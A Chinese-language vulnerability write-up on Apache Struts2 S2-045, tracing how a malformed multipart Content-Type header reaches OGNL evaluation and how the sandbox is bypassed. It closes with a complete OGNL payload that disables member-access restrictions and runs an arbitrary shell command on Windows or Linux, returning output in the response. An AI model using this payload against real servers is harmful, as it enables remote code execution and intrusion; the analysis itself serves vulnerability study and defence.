Smi1e@Pentes7eam漏洞信息:
https://cwiki.Apache.org/confluence/display/WW/S2-045
Struts2默认使用
org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest
类对上传数据进行解析 。其在处理Content-Type
时如果获得非预期的值的话,将会抛出一个异常,在此异常的处理中会对错误信息进行OGNL表达式解析 。
漏洞复现
文章插图
影响范围Struts 2.3.5 - 2.3.31, Struts 2.5 - 2.5.10
【Struts2漏洞系列之「S2-045」上传数据异常导致的OGNL表达式执行】
漏洞分析Struts 2.3.5 - 2.3.31和Struts 2.5 - 2.5.10漏洞入口不同
前者调用栈
文章插图
在过滤器
org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter
的dofilter
方法中下断点,跟进this.prepare.wrapRequest(request);
,它会封装request
对象 。文章插图
其中会判断
content_type
中是否含有字符串multipart/form-data
,如果有则实例化MultiPartRequestWrApper
对象,并传入对应参数来对请求进行解析 。其中this.getMultiPartRequest;
会去获取用来处理文件上传请求的解析类,默认是org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest
。我们可以通过配置struts.multipart.parser
属性来指定不同的解析类 。文章插图
跟进
this.multi.parse(request, saveDir);
,这里的this.multi
就是默认的JakartaMultiPartRequest
对象 。文章插图
这里由于对上传请求解析时发现错误所以会进入到下面的
catch
操作中,跟进this.buildErrorMessage
文章插图
它会调用
LocalizedTextUtil.findText
处理错误信息文章插图
不断跟进会发现他会把message传入
TextParseUtil.translateVariables
进行表达式解析 。文章插图
后面就还是以前的流程了 。
文章插图
而 Struts 2.5 - 2.5.10中
org.apache.struts2.dispatcher.multipart.MultiPartRequestWrapper.buildErrorMessage
并没有调用LocalizedTextUtil.findText
文章插图
它是在拦截器
FileUploadInterceptor
中调用的LocalizedTextUtil.findText(error.getClazz, error.getTextKey,
ActionContext.getContext.getLocale, error.getDefaultMessage, error.getArgs);
从而对错误信息进行OGNL表达式解析文章插图
在2.3.30/2.5.2之后的版本,我们可以用来bypass黑名单过滤的
_memberAccess
和DefaultMemberAccess
都进入到了黑名单中 。文章插图
不过个人认为沙盒修复的关键是Ognl3.0.18+和Ognl3.1.10+中
OgnlContext
删除了_memberAccess
这个key,从而禁止了对_memberAccess
的访问 。Struts2.3.30开始使用的是Ognl3.0.19,Struts2.5.2开始使用的是Ognl3.1.10 。从S2-045的payload中也能看出来,直接可以执行(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)
,后面才开始查看是否存在#_memberAccess
。-
%{(#fuck='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames.clear).(#ognlUtil.getExcludedClasses.clear).(#context.setMemberAccess(#dm)))).(#cmd='CMD').(#iswin=(@JAVA.lang.System@getProperty('os.name').toLowerCase.contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=newjava.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start).(#ros=(@org.apache.struts2.ServletActionContext@getResponse.getOutputStream)).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream,#ros)).(#ros.flush)}
推荐阅读
- 淘宝违规词上架不被删除?是技巧还是走系统漏洞? 淘宝违规词要不要处理
- 漏洞无处不在,3步教你暴力破解ssh服务
- 海带|油头洗发水推荐,希芸专研洗护系列控油去屑,滋养头皮
- 法国依云矿泉传奇,宝和祥孔雀传奇系列
- CVE-2020-1948: Apache Dubbo 远程代码执行漏洞通告
- Google Maps与Photos服务即将带来一系列新功能
- 常见加密算法 「asp.net core 系列」12 数据加密算法
- 关于 JOIN 耐心总结,学不会你打我系列
- 茶馆系列之五,巴蜀茶馆的习俗
- 漏洞扫描技巧篇 「Web 漏洞扫描器」